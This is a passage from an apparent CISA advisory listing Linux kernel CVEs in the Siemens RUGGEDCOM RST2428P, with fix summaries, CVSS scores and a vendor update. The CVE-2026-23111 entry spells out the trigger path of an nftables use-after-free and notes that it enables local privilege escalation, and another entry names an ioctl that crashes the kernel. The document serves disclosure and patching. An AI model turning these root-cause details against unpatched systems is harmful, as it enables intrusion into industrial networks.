<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23033">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23037</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: can: etas_es58x: allow partial RX URB allocation to succeed When es58x_alloc_rx_urbs() fails to allocate the requested number of URBs but succeeds in allocating some, it returns an error code. This causes es58x_open() to return early, skipping the cleanup label 'free_urbs', which leads to the anchored URBs being leaked. As pointed out by maintainer Vincent Mailhol, the driver is designed to handle partial URB allocation gracefully. Therefore, partial allocation should not be treated as a fatal error. Modify es58x_alloc_rx_urbs() to return 0 if at least one URB has been allocated, restoring the intended behavior and preventing the leak in es58x_open().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23037">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23038</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: pnfs/flexfiles: Fix memory leak in nfs4_ff_alloc_deviceid_node() In nfs4_ff_alloc_deviceid_node(), if the allocation for ds_versions fails, the function jumps to the out_scratch label without freeing the already allocated dsaddrs list, leading to a memory leak. Fix this by jumping to the out_err_drain_dsaddrs label, which properly frees the dsaddrs list before cleaning up other resources.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23038">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23111</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: fix inverted genmask check in nft_map_catchall_activate() nft_map_catchall_activate() has an inverted element activity check compared to its non-catchall counterpart nft_mapelem_activate() and compared to what is logically required. nft_map_catchall_activate() is called from the abort path to re-activate catchall map elements that were deactivated during a failed transaction. It should skip elements that are already active (they don't need re-activation) and process elements that are inactive (they need to be restored). Instead, the current code does the opposite: it skips inactive elements and processes active ones. Compare the non-catchall activate callback, which is correct: nft_mapelem_activate(): if (nft_set_elem_active(ext, iter-&gt;genmask)) return 0; /* skip active, process inactive */ With the buggy catchall version: nft_map_catchall_activate(): if (!nft_set_elem_active(ext, genmask)) continue; /* skip inactive, process active */ The consequence is that when a DELSET operation is aborted, nft_setelem_data_activate() is never called for the catchall element. For NFT_GOTO verdict elements, this means nft_data_hold() is never called to restore the chain-&gt;use reference count. Each abort cycle permanently decrements chain-&gt;use. Once chain-&gt;use reaches zero, DELCHAIN succeeds and frees the chain while catchall verdict elements still reference it, resulting in a use-after-free. This is exploitable for local privilege escalation from an unprivileged user via user namespaces + nftables on distributions that enable CONFIG_USER_NS and CONFIG_NF_TABLES. Fix by removing the negation so the check matches nft_mapelem_activate(): skip active elements, process inactive ones.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23111">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23112</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nvmet-tcp: add bounds checks in nvmet_tcp_build_pdu_iovec nvmet_tcp_build_pdu_iovec() could walk past cmd-&gt;req.sg when a PDU length or offset exceeds sg_cnt and then use bogus sg-&gt;length/offset values, leading to _copy_to_iter() GPF/KASAN. Guard sg_idx, remaining entries, and sg-&gt;length/offset before building the bvec.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23112">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23220</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix infinite loop caused by next_smb2_rcv_hdr_off reset in error paths The problem occurs when a signed request fails smb2 signature verification check. In __process_request(), if check_sign_req() returns an error, set_smb2_rsp_status(work, STATUS_ACCESS_DENIED) is called. set_smb2_rsp_status() set work-&gt;next_smb2_rcv_hdr_off as zero. By resetting next_smb2_rcv_hdr_off to zero, the pointer to the next command in the chain is lost. Consequently, is_chained_smb2_message() continues to point to the same request header instead of advancing. If the header's NextCommand field is non-zero, the function returns true, causing __handle_ksmbd_work() to repeatedly process the same failed request in an infinite loop. This results in the kernel log being flooded with "bad smb2 signature" messages and high CPU usage. This patch fixes the issue by changing the return value from SERVER_HANDLER_CONTINUE to SERVER_HANDLER_ABORT. This ensures that the processing loop terminates immediately rather than attempting to continue from an invalidated offset.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23220">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/835.html">CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23222</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: omap - Allocate OMAP_CRYPTO_FORCE_COPY scatterlists correctly The existing allocation of scatterlists in omap_crypto_copy_sg_lists() was allocating an array of scatterlist pointers, not scatterlist objects, resulting in a 4x too small allocation. Use sizeof(*new_sg) to get the correct object size.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23222">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23228</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: smb: server: fix leak of active_num_conn in ksmbd_tcp_new_connection() On kthread_run() failure in ksmbd_tcp_new_connection(), the transport is freed via free_transport(), which does not decrement active_num_conn, leaking this counter. Replace free_transport() with ksmbd_tcp_disconnect().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23228">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23229</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: virtio - Add spinlock protection with virtqueue notification When VM boots with one virtio-crypto PCI device and builtin backend, run openssl benchmark command with multiple processes, such as openssl speed -evp aes-128-cbc -engine afalg -seconds 10 -multi 32 openssl processes will hangup and there is error reported like this: virtio_crypto virtio0: dataq.0:id 3 is not a head! It seems that the data virtqueue need protection when it is handled for virtio done notification. If the spinlock protection is added in virtcrypto_done_task(), openssl benchmark with multiple processes works well.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23229">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/820.html">CWE-820 Missing Synchronization</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23230</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: smb: client: split cached_fid bitfields to avoid shared-byte RMW races is_open, has_lease and on_list are stored in the same bitfield byte in struct cached_fid but are updated in different code paths that may run concurrently. Bitfield assignments generate byte read–modify–write operations (e.g. `orb $mask, addr` on x86_64), so updating one flag can restore stale values of the others. A possible interleaving is: CPU1: load old byte (has_lease=1, on_list=1) CPU2: clear both flags (store 0) CPU1: RMW store (old | IS_OPEN) -&gt; reintroduces cleared bits To avoid this class of races, convert these flags to separate bool fields.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23230">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23231</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: fix use-after-free in nf_tables_addchain() nf_tables_addchain() publishes the chain to table-&gt;chains via list_add_tail_rcu() (in nft_chain_add()) before registering hooks. If nf_tables_register_hook() then fails, the error path calls nft_chain_del() (list_del_rcu()) followed by nf_tables_chain_destroy() with no RCU grace period in between. This creates two use-after-free conditions: 1) Control-plane: nf_tables_dump_chains() traverses table-&gt;chains under rcu_read_lock(). A concurrent dump can still be walking the chain when the error path frees it. 2) Packet path: for NFPROTO_INET, nf_register_net_hook() briefly installs the IPv4 hook before IPv6 registration fails. Packets entering nft_do_chain() via the transient IPv4 hook can still be dereferencing chain-&gt;blob_gen_X when the error path frees the chain. Add synchronize_rcu() between nft_chain_del() and the chain destroy so that all RCU readers -- both dump threads and in-flight packet evaluation -- have finished before the chain is freed.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23231">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23236</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fbdev: smscufx: properly copy ioctl memory to kernelspace The UFX_IOCTL_REPORT_DAMAGE ioctl does not properly copy data from userspace to kernelspace, and instead directly references the memory, which can cause problems if invalid data is passed from userspace. Fix this all up by correctly copying the memory before accessing it within the kernel.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23236">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.3</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23238</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: romfs: check sb_set_blocksize() return value romfs_fill_super() ignores the return value of sb_set_blocksize(), which can fail if the requested block size is incompatible with the block device's configuration. This can be triggered by setting a loop device's block size larger than PAGE_SIZE using ioctl(LOOP_SET_BLOCK_SIZE, 32768), then mounting a romfs filesystem on that device. When sb_set_blocksize(sb, ROMBSIZE) is called with ROMBSIZE=4096 but the device has logical_block_size=32768, bdev_validate_blocksize() fails because the requested size is smaller than the device's logical block size. sb_set_blocksize() returns 0 (failure), but romfs ignores this and continues mounting. The superblock's block size remains at the device's logical block size (32768). Later, when sb_bread() attempts I/O with this oversized block size, it triggers a kernel BUG in folio_set_bh(): kernel BUG at fs/buffer.c:1582! BUG_ON(size &gt; PAGE_SIZE); Fix by checking the return value of sb_set_blocksize() and failing the mount with -EINVAL if it returns 0.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23238">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-24515</a></h3>
<div class="csaf-accordion-content">
<p>In libexpat before 2.7.4, XML_ExternalEntityParserCreate does not copy unknown encoding handler user data.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-24515">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
